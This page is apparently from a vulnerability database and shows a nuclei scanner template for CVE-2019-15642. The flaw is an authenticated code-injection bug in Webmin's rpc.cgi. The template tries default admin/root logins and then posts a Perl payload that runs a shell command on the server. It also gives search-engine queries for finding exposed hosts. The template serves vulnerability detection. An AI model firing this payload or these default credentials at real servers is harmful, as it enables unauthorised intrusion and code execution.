Lucene search
K

Webmin < 1.920 - Authenticated Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Webmin < 1.920 - Authenticated Remote Code Executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform
8 Dec 202020:38
gitee
Gitee
Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform
6 May 202015:20
gitee
Circl
CVE-2019-15642
17 Nov 202305:26
circl
CNVD
Webmin Code Injection Vulnerability
27 Aug 201900:00
cnvd
Check Point Advisories
Webmin rpc.cgi Remote Code Execution (CVE-2019-15642)
12 Sep 201900:00
checkpoint_advisories
CVE
CVE-2019-15642
26 Aug 201917:07
cve
Cvelist
CVE-2019-15642
26 Aug 201917:07
cvelist
GithubExploit
Exploit for Code Injection in Webmin
1 Sep 201909:28
githubexploit
NVD
CVE-2019-15642
26 Aug 201918:15
nvd
OpenVAS
Webmin < 1.930 RCE Vulnerability
27 Aug 201900:00
openvas
Rows per page
id: CVE-2019-15642

info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
    - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index
    - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37
    - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-15642
    cwe-id: CWE-94
    epss-score: 0.38038
    epss-percentile: 0.9837
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: webmin
    product: webmin
    shodan-query:
      - title:"Webmin"
      - http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2019,webmin,rce,vkev,vuln
variables:
  cmd: '`id`'

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate

        user={{username}}&pass={{password}}
      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate

        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";

    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root
    stop-at-first-match: true
    host-redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'

      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100be1e56e58d7eb9c132e52eea11aadd272daa085df53c4223792a18e4bfca83db022100afe8d6c06f12e48c6ebd2c2fddb994a8b9494aa986a19ac29799c71e610f1cb5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation